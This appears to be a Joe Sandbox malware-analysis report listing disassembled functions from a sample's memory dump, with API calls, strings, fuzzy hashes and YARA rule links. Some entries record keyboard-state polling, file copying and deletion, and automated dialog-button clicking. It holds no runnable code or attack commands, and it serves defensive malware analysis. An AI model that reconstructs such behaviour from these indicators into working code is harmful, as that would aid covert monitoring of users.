Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: L6L
API String ID: 1433390588-1891053944
Opcode ID: ba82063b8b1465d10893cbff79d01a7e013dac4234232cdcf369633e7a3ff8f4
Instruction ID: 62ceea626457bf029dc88df89d02f9f1a72a5205fd3f94d465b018ac635fe8e6
Opcode Fuzzy Hash: ba82063b8b1465d10893cbff79d01a7e013dac4234232cdcf369633e7a3ff8f4
Instruction Fuzzy Hash: DC31B2B1904256BBCB019FA0ED85EAF7BA9FF08341F004477FD01D2251E738D955D6A8

Function 004583D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045843F
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00458455
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00458466
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00458478
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00458489

Strings

close PlayMe, xrefs: 00458450, 0045847D
play PlayMe wait, xrefs: 00458473
alias PlayMe, xrefs: 00458418
play PlayMe, xrefs: 00458484
status PlayMe mode, xrefs: 0045843A
open , xrefs: 004583EE

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a3390d600e976fe5a6cb598fc37bf0076ce625e431551b41875a642d858b697b
Instruction ID: faeb14e26ad5c2b1858eee1509d508e54971fe98a0f74c3fdda455ad09bd51a2
Opcode Fuzzy Hash: a3390d600e976fe5a6cb598fc37bf0076ce625e431551b41875a642d858b697b
Instruction Fuzzy Hash: 521108B4A4015D79D710BBA2CC4AFFF7B7CEB91B05F00442F7811A20C1EEA81A44C9B8

Function 00458097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0045809C

Part of subcall function 0042E3A5: timeGetTime.WINMM(?,7707B400,00486163), ref: 0042E3A9

Sleep.KERNEL32(0000000A), ref: 004580C8
EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 004580EC
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0045810E
SetActiveWindow.USER32 ref: 0045812D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0045813B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0045815A
Sleep.KERNEL32(000000FA), ref: 00458165
IsWindow.USER32 ref: 00458171
EndDialog.USER32(00000000), ref: 00458182

Strings

BUTTON, xrefs: 00458100

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 493b00a661c4187c59e01572d0d29560d9e6ac4e4918464150f88395aa2f9fdc
Instruction ID: c063085c11bfe2d1adfd896bbf14a0bf96562e7aee55bdd7dd1f47a4ba6416d4
Opcode Fuzzy Hash: 493b00a661c4187c59e01572d0d29560d9e6ac4e4918464150f88395aa2f9fdc
Instruction Fuzzy Hash: 2F21A770601605BFE7125F21ED89B263B2AF76475BF05013BF901A32A2CF7A4D098B1E

Function 0045C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0045C6A0: __time64.LIBCMT ref: 0045C6AA

Part of subcall function 004141A7: _fseek.LIBCMT ref: 004141BF

__wsplitpath.LIBCMT ref: 0045C96F

Part of subcall function 0043297D: __wsplitpath_helper.LIBCMT ref: 004329BD

_wcscpy.LIBCMT ref: 0045C982
_wcscat.LIBCMT ref: 0045C995
__wsplitpath.LIBCMT ref: 0045C9BA
_wcscat.LIBCMT ref: 0045C9D0
_wcscat.LIBCMT ref: 0045C9E3

Part of subcall function 0045C6E4: _memmove.LIBCMT ref: 0045C71D
Part of subcall function 0045C6E4: _memmove.LIBCMT ref: 0045C72C

_wcscmp.LIBCMT ref: 0045C92A

Part of subcall function 0045CE59: _wcscmp.LIBCMT ref: 0045CF49
Part of subcall function 0045CE59: _wcscmp.LIBCMT ref: 0045CF5C

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0045CB8D
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0045CC24
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0045CC3A
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0045CC4B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0045CC5D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 152968663-0
Opcode ID: 7768eef6c7e0f05b010863600bcb1ca889e326fbd95bf1ecc97e3aa899cf490c
Instruction ID: 6c1c92555a3856e37677f5c08d5507179f431413d5904307a5246ed2409f5ca6
Opcode Fuzzy Hash: 7768eef6c7e0f05b010863600bcb1ca889e326fbd95bf1ecc97e3aa899cf490c
Instruction Fuzzy Hash: 1CC13BB1D00219AECF11DF95CC81EDEBBB9AF59314F0040ABF609E6151D7749A88CF69

Function 004608D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046090D
_memset.LIBCMT ref: 00460928
CoInitialize.OLE32(00000000), ref: 0046093B
SHGetMalloc.SHELL32(?), ref: 00460945
CoUninitialize.COMBASE ref: 0046094F
_wcscpy.LIBCMT ref: 00460993
SHGetDesktopFolder.SHELL32(?), ref: 004609F5
_wcscpy.LIBCMT ref: 00460A1B
_wcscpy.LIBCMT ref: 00460A77
SHBrowseForFolderW.SHELL32 ref: 00460AA2
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00460AC5
CoUninitialize.COMBASE ref: 00460B11

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
String ID:
API String ID: 3566271842-0
Opcode ID: 14e5e46ba1378a90950de7d4300bb46884ee2345ef8c658faf409af6a9e13381
Instruction ID: 04c989f9e145cd834c853591b30367ba55c2c920c91231fa65dee7582bcd0a39
Opcode Fuzzy Hash: 14e5e46ba1378a90950de7d4300bb46884ee2345ef8c658faf409af6a9e13381
Instruction Fuzzy Hash: 1A7132B5900119AFDB10DFA5C884ADEB7B9FF49314F0480AAE919A7251D734EE44CF98

Function 0045388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00453908
SetKeyboardState.USER32(?), ref: 00453973
GetAsyncKeyState.USER32(000000A0), ref: 00453993
GetKeyState.USER32(000000A0), ref: 004539AA
GetAsyncKeyState.USER32(000000A1), ref: 004539D9
GetKeyState.USER32(000000A1), ref: 004539EA
GetAsyncKeyState.USER32(00000011), ref: 00453A16
GetKeyState.USER32(00000011), ref: 00453A24
GetAsyncKeyState.USER32(00000012), ref: 00453A4D
GetKeyState.USER32(00000012), ref: 00453A5B
GetAsyncKeyState.USER32(0000005B), ref: 00453A84
GetKeyState.USER32(0000005B), ref: 00453A92

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 1c8e8d8768a5c03ca3ef98c4e13f45a194ebd805d5b71344c084dbe2b6191f3b
Instruction ID: 9c90feed2ef1e2a732b2b91bafc86754f577cb4a97f87069698214e381523a07
Opcode Fuzzy Hash: 1c8e8d8768a5c03ca3ef98c4e13f45a194ebd805d5b71344c084dbe2b6191f3b
Instruction Fuzzy Hash: C651BB6090478829FB35EFA484117ABAFF45F413C6F08459FD9C25A2C3DA589F8CC769

Function 0044FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0044FB19
GetWindowRect.USER32(00000000,?), ref: 0044FB2B
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0044FB89
GetDlgItem.USER32(?,00000002), ref: 0044FB94
GetWindowRect.USER32(00000000,?), ref: 0044FBA6
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0044FBFC
GetDlgItem.USER32(?,000003E9), ref: 0044FC0A
GetWindowRect.USER32(00000000,?), ref: 0044FC1B
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0044FC5E
GetDlgItem.USER32(?,000003EA), ref: 0044FC6C
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0044FC89
InvalidateRect.USER32(?,00000000,00000001), ref: 0044FC96

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: e8aaf1b1aa3c59aaee63778f2b3cf92dbee6cd0a26214436206289abbb5600fa
Instruction ID: 15b46d14ead566d144941adb2270424c2f80bf875997aab3ea0945ceebeb8db2
Opcode Fuzzy Hash: e8aaf1b1aa3c59aaee63778f2b3cf92dbee6cd0a26214436206289abbb5600fa
Instruction Fuzzy Hash: 73510071B00209AFDB18CF69DD99BAEBBB6FB98310F14813AB915D7290D774AD048B14

Function 0042B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0042B155: GetWindowLongW.USER32(?,000000EB), ref: 0042B166

GetSysColor.USER32(0000000F), ref: 0042B067

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e85cca70e1ed10e45a778116482f7da02f4d988a6fa4e52884f83a2326319e75
Instruction ID: c70c57481f15d458c55a2e9597be3968f4b8c7e0e5d02573a4100031a8e150d5
Opcode Fuzzy Hash: e85cca70e1ed10e45a778116482f7da02f4d988a6fa4e52884f83a2326319e75
Instruction Fuzzy Hash: 4041C431600550ABDB216F28EC49BBA3765EB06770F544277FD658B2E2C7348C42DBAA

Function 00457334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 0045734C
_wcscpy.LIBCMT ref: 0045735D
__wsplitpath.LIBCMT ref: 00457384
__wsplitpath.LIBCMT ref: 004573A8
_wcscpy.LIBCMT ref: 004573CA
_wcscpy.LIBCMT ref: 004573E8
_wcscpy.LIBCMT ref: 004573F9
_wcscat.LIBCMT ref: 00457408
_wcscat.LIBCMT ref: 0045745D
_wcscat.LIBCMT ref: 00457493
_wcscat.LIBCMT ref: 004574A5

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 593c86895d87d4ea9cabdad3f39ca2398b8c1ef936bf020f72c532c4169a9185
Instruction ID: ebbc88f4ded24addb4546bce709e38e504997c85cf14ccd3e2e7ef3f0e8b1b41
Opcode Fuzzy Hash: 593c86895d87d4ea9cabdad3f39ca2398b8c1ef936bf020f72c532c4169a9185
Instruction Fuzzy Hash: 4D4100B290411CAADB21EB51DC41EDE73BCAF08314F5041EBB919A2051EA799BD8CF68

Function 004184A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004184E5
__itow.LIBCMT ref: 00418519

Part of subcall function 00432177: _xtow@16.LIBCMT ref: 00432198

Strings

True, xrefs: 00485561
False, xrefs: 00485568
0x%p, xrefs: 00485582
%.15g, xrefs: 004184DF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 7438d43caddda30310fbb64c8dbfb8299578475f62742f8359252e533b94e5d8
Instruction ID: e1fd68b2d89f2c1e5fdce8dcc7bff0cc8c24fd28da71d4ce762fb4758535db1f
Opcode Fuzzy Hash: 7438d43caddda30310fbb64c8dbfb8299578475f62742f8359252e533b94e5d8
Instruction Fuzzy Hash: 7A41F271600605ABDB24EF38D941FAA77E5BF48304F30486FE549D6291EE3D9A82CB19

Function 00435C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00435CCA

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

__gmtime64_s.LIBCMT ref: 00435D63
__gmtime64_s.LIBCMT ref: 00435D99
__gmtime64_s.LIBCMT ref: 00435DB6
__allrem.LIBCMT ref: 00435E0C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435E28
__allrem.LIBCMT ref: 00435E3F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435E5D
__allrem.LIBCMT ref: 00435E74
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435E92
__invoke_watson.LIBCMT ref: 00435F03

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction ID: 08f45bda82413e9efcc2ef83d6e356c08be1cf0eabefab631513125bc92a822f
Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction Fuzzy Hash: 8071EA71A01B16ABE7149F79CC42BAB73A8AF18728F14512FF510D7781E778DE408B98

Function 004557FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455816
GetMenuItemInfoW.USER32(004D18F0,000000FF,00000000,00000030), ref: 00455877
SetMenuItemInfoW.USER32(004D18F0,00000004,00000000,00000030), ref: 004558AD
Sleep.KERNEL32(000001F4), ref: 004558BF
GetMenuItemCount.USER32(?), ref: 00455903
GetMenuItemID.USER32(?,00000000), ref: 0045591F
GetMenuItemID.USER32(?,-00000001), ref: 00455949
GetMenuItemID.USER32(?,?), ref: 0045598E
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004559D4
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004559E8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00455A09

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 45e2742e54e811748b3f7c746dd43af3dafbb6945dd088b5527026420e1b1de9
Instruction ID: f746e13b441d7c8ecc59ba367c971915aaacb53d03d18236381dc6e3c4deaccb
Opcode Fuzzy Hash: 45e2742e54e811748b3f7c746dd43af3dafbb6945dd088b5527026420e1b1de9
Instruction Fuzzy Hash: 9F61C3B0900649EFDB11DFA4D8A4ABF7BB9EF01319F14016BEC41A7252D7389D09CB29

Function 00479A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00479AA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00479AA8
GetWindowLongW.USER32(?,000000F0), ref: 00479ACC
_memset.LIBCMT ref: 00479ADD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00479AEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00479B67

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c6daffeef97e667f6473898abe75d51f31e9e96dfb7de23f6987f5b417951a2b
Instruction ID: b648517e851044f1082978e81167dcbdf80b4a77ab0d1541cd7be9ea21d94058
Opcode Fuzzy Hash: c6daffeef97e667f6473898abe75d51f31e9e96dfb7de23f6987f5b417951a2b
Instruction Fuzzy Hash: 55615D75900248AFDB11DFA8CC81EEE77F8AF09704F10416AFA19A72A2D774AD41DB54

Function 00453569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00453591
GetAsyncKeyState.USER32(000000A0), ref: 00453612
GetKeyState.USER32(000000A0), ref: 0045362D
GetAsyncKeyState.USER32(000000A1), ref: 00453647
GetKeyState.USER32(000000A1), ref: 0045365C
GetAsyncKeyState.USER32(00000011), ref: 00453674
GetKeyState.USER32(00000011), ref: 00453686
GetAsyncKeyState.USER32(00000012), ref: 0045369E
GetKeyState.USER32(00000012), ref: 004536B0
GetAsyncKeyState.USER32(0000005B), ref: 004536C8
GetKeyState.USER32(0000005B), ref: 004536DA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e16e98ca23a3874e83034411a2893fc8497f901a699f546311ef29c4a5a86e66
Instruction ID: a7c3879538a0943dc23bc86ede478fd2b72533ce494a4a6e33ff3338d0d8cfc9
Opcode Fuzzy Hash: e16e98ca23a3874e83034411a2893fc8497f901a699f546311ef29c4a5a86e66
Instruction Fuzzy Hash: 384183609047C97DFF315F6484143A7AAA06B21387F04405FDDC6463C3EAA89BCC8B6A

Function 0044A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

